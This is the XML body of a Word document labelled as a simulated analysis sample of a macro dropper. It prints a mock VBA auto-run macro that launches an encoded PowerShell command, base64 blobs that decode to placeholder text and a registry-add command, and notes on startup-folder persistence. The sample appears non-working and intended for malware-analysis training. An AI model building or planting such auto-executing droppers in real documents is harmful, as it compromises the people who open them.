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>
  <w:body>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">SIMULATED ARTIFACT - ANALYSIS SAMPLE - MACRO DROPPER REVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Module MacroDropper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Sub Document_Open()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">DropPayload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">End Sub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Function DropPayload()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Chr(77,115,98,117,105,108,100,32,100,114,111,112,112,101,114,32,112,97,121,108,111,97,100)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Shell("powershell -EncodedCommand TW9kZSBSYW5zb213YXJlU3R1ZmYgQ2FsbE9mZmljZSBJbnZvaWNlTGF5b3V0")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Encoded blob: TW9kZSBSYW5zb213YXJlU3R1ZmYgQ2FsbE9mZmljZSBJbnZvaWNlTGF5b3V0ICgpIFNoZWxsICJwb3dlcnNoZWxsIC1FbmNvZGVkQ29tbWFuZCAyOTI0dWpzIiBEdW5kICJjbWQgL2MgcmVnIGFkZCBIS0xNIFNvZnR3YXJlXFJhbnNvbVdhcmUi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Payload extracted to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\vault.lnk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Dropper activates on the next user logon.</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>